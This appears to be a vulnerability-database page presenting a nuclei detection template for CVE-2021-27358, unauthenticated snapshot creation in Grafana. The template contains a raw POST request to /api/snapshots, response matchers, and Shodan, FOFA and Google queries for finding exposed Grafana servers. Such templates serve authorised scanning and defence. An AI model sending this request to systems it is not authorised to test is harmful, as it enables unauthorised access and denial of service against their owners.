Lucene search
K

Grafana Unauthenticated Snapshot Creation

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 56 Views

Grafana Unauthenticated Snapshot Creation, CVE-2021-27358, high severity, allows unauthenticated attacker to trigger Denial of Service via remote API call leading to unauthorized access and data exposure. Upgrade to latest version or apply patch

Related
Refs
Code
id: CVE-2021-27358

info:
  name: Grafana Unauthenticated Snapshot Creation
  author: pdteam,bing0o
  severity: high
  description: Grafana 6.7.3 through 7.4.1 snapshot functionality can allow an unauthenticated remote attacker to trigger a Denial of Service via a remote API call if a commonly used configuration is set.
  impact: |
    An attacker can create snapshots of sensitive data without authentication, potentially leading to unauthorized access and data exposure.
  remediation: |
    Upgrade to the latest version of Grafana that includes a fix for CVE-2021-27358 or apply the provided patch to mitigate the vulnerability.
  reference:
    - https://phabricator.wikimedia.org/T274736
    - https://grafana.com/docs/grafana/latest/release-notes/release-notes-7-4-2/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-27358
    - https://github.com/grafana/grafana/blob/master/CHANGELOG.md
    - https://github.com/grafana/grafana/blob/master/CHANGELOG.md#742-2021-02-17
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
    cvss-score: 7.5
    cve-id: CVE-2021-27358
    cwe-id: CWE-306
    epss-score: 0.83042
    epss-percentile: 0.99636
    cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: grafana
    product: grafana
    shodan-query:
      - title:"Grafana"
      - cpe:"cpe:2.3:a:grafana:grafana"
      - http.title:"grafana"
    fofa-query:
      - title="grafana"
      - app="grafana"
    google-query: intitle:"grafana"
  tags: cve2021,cve,grafana,unauth,vuln,vkev

http:
  - raw:
      - |
        POST /api/snapshots HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"deleteUrl":'
          - '"deleteKey":'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"
# digest: 4a0a00473045022100dd0a813b91360553b0c778b0eca9e44d8af292929b56476d68b9f09f0e109a53022005cac202022dcdd606e70f49509edd25a356d3b6b1e3c1e7e7169a7fdb2ad43a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 25
CVSS 3.17.5
EPSS0.83042
56